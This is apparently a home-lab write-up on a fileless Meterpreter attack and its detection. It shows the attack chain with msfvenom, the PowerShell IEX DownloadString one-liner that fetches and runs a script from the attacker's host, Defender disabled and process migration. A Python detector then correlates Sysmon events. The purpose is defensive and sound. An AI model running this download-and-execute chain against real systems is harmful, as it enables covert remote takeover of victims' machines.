Project Summary
This project demonstrates a fileless malware attack using a PowerShell IEX DownloadString payload generated in psh-reflection format. The payload executes entirely in memory — no file is written to disk on the victim machine. Detection is achieved through Sysmon command-line argument logging forwarded to Wazuh SIEM, mapped to MITRE ATT&CK.
Overview
This lab highlights a critical detection gap: traditional AV scans files on disk and finds nothing. Sysmon defeats fileless attacks by capturing the full PowerShell command line at process creation time, regardless of whether a file exists on disk.
The objective was to demonstrate how behavioral detection via command-line logging catches what signature-based tools miss.
Lab Environment
| Role | OS | IP | Tools |
|---|---|---|---|
| Attacker | Kali Linux (VM) | 192.168.0.244 | Metasploit 6.4.56, msfvenom |
| Victim | Windows 10 (VM) | 192.168.0.29 | Sysmon64 (Running), Wazuh Agent |
| SIEM | Ubuntu Server (VM) | — | Wazuh 4.x |
Prerequisites Check
Before the attack, Sysmon64 and WazuhSvc were confirmed running on the victim. Defender real-time protection was disabled (`DisableRealtimeMonitoring: True`).

Attack Chain
- Payload generation — msfvenom creates `payload1.ps1` using the `-f psh-reflection` format (in-memory only)
- Delivery — Python HTTP server serves `payload1.ps1` on port 8080
- Execution — victim runs: `powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.244:8080/payload1.ps1')"`
- Session — Meterpreter session opens; payload never touches disk
- Migration — `migrate 2080` moves the session into another process
- Reconnaissance — `whoami`, `hostname`, `net user`, `netstat -ano`
Why This Is “Fileless”
- The `-f psh-reflection` format outputs a PowerShell script that uses .NET reflection to load shellcode directly into memory
- `DownloadString()` fetches the script as a string object — it is never saved as a file
- `IEX` (Invoke-Expression) executes the string directly in PowerShell process memory
- Result: no file on disk, no hash for AV to scan, no artifact for forensic file recovery
Detection Results
Sysmon Event ID 1 — Process Creation
Sysmon captured the full PowerShell command line including IEX, DownloadString, and the payload URL.
- ProcessId: `5036`
- Image: `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`
- IntegrityLevel: High
- Key IOCs: `IEX` + `DownloadString` in command line, `-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden`

Sysmon Event ID 3 — Network Connection
powershell.exe (PID 5036) initiated outbound TCP connection to 192.168.0.244:4444.

Event Correlation
EID 3 logged at 17:35:57 — EID 1 at 17:35:59. Both share the same ProcessGuid {48579f23-e57f-6a11-5102-000000002000}. The network connection (payload download) happened 2 seconds before the process creation event — typical timing pattern for DownloadString + IEX execution, useful for timeline reconstruction.
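The EID 1 command-line indicators above and the EID 1 / EID 3 ProcessGuid join, as an added Python example that is not part of this lab (Wazuh would do this with decoders and rules; here it is plain code run over constructed records). Assumptions: the records are dicts carrying Sysmon-style field names rather than real Wazuh output, the technique mapping follows this writeup's table, the "non-80/443 port means T1571" heuristic is mine, and the benign process GUID is a placeholder.

```python
import re
from collections import defaultdict

# Command-line indicators -> ATT&CK IDs, following the mapping used in this writeup (case-insensitive).
INDICATORS = {
    "iex": (r"\b(IEX|Invoke-Expression)\b", ["T1059.001"]),
    "downloadstring": (r"\.DownloadString\s*\(", ["T1059.001", "T1105"]),
    "executionpolicy_bypass": (r"-ExecutionPolicy\s+Bypass\b", ["T1059.001"]),
    "hidden_window": (r"-WindowStyle\s+Hidden\b", ["T1564.003"]),
}

def analyze_command_line(cmd):
    """Scan an EID 1 CommandLine; 'suspicious' requires both IEX and DownloadString (download-and-execute)."""
    hits = [n for n, (rx, _) in INDICATORS.items() if re.search(rx, cmd, re.IGNORECASE)]
    techniques = sorted({t for n in hits for t in INDICATORS[n][1]})
    return {"suspicious": "iex" in hits and "downloadstring" in hits, "indicators": hits, "techniques": techniques}

def correlate(events):
    """Join EID 1 and EID 3 on ProcessGuid; assumption: any non-80/443 destination port is tagged T1571."""
    by_guid = defaultdict(lambda: {"proc": None, "conns": []})
    for ev in events:
        if ev["EventID"] == 1:
            by_guid[ev["ProcessGuid"]]["proc"] = ev
        elif ev["EventID"] == 3:
            by_guid[ev["ProcessGuid"]]["conns"].append(ev)
    report = {}
    for guid, slot in by_guid.items():
        proc = slot["proc"]
        verdict = analyze_command_line(proc["CommandLine"]) if proc else {"suspicious": False}
        if not verdict["suspicious"]:
            continue  # benign process, or an EID 3 whose EID 1 has not arrived yet
        techniques = set(verdict["techniques"])
        if any(c["DestinationPort"] not in (80, 443) for c in slot["conns"]):
            techniques.add("T1571")
        report[guid] = {"image": proc["Image"], "techniques": sorted(techniques),
                        "c2": [f'{c["DestinationIp"]}:{c["DestinationPort"]}' for c in slot["conns"]]}
    return report

# Constructed sample records shaped like Sysmon EID 1 / EID 3 fields: the lab's values plus one benign control.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
GUID = "{48579f23-e57f-6a11-5102-000000002000}"
SAMPLE_EVENTS = [
    {"EventID": 3, "UtcTime": "17:35:57", "ProcessGuid": GUID, "Image": PS,
     "DestinationIp": "192.168.0.244", "DestinationPort": 4444},
    {"EventID": 1, "UtcTime": "17:35:59", "ProcessGuid": GUID, "Image": PS, "CommandLine":
     "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "
     "\"IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.244:8080/payload1.ps1')\""},
    {"EventID": 1, "UtcTime": "17:40:10", "ProcessGuid": "{PLACEHOLDER-BENIGN-GUID}", "Image": PS, "CommandLine": "powershell -NoProfile -Command \"Get-Process | Sort-Object CPU\""},
]
```

Running `correlate(SAMPLE_EVENTS)` reports only the lab's ProcessGuid with its 192.168.0.244:4444 connection; the benign PowerShell invocation produces no entry.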
MITRE ATT&CK Techniques Observed
| Technique ID | Name |
|---|---|
| T1059.001 | Command and Scripting Interpreter: PowerShell — IEX DownloadString, in-memory |
| T1055 | Process Injection / Migration — migrate 2080 |
| T1105 | Ingress Tool Transfer — payload1.ps1 fetched at runtime |
| T1571 | Non-Standard Port — C2 on port 4444 |
| T1562.001 | Impair Defenses — Defender disabled |
| T1564.003 | Hide Artifacts: Hidden Window — -WindowStyle Hidden |
Key Findings
- A fileless Meterpreter payload executed entirely in memory — no file written to disk on the victim.
- Sysmon EID 1 captured the complete PowerShell command line including `IEX` and `DownloadString` — the single most valuable detection artifact.
- Sysmon EID 3 logged the outbound C2 connection from `powershell.exe` to port 4444.
- Event correlation via shared ProcessGuid enabled precise timeline reconstruction.
- Key lesson: fileless attacks completely bypass disk-based AV. Sysmon command-line logging (EID 1) is the critical control that makes these attacks visible.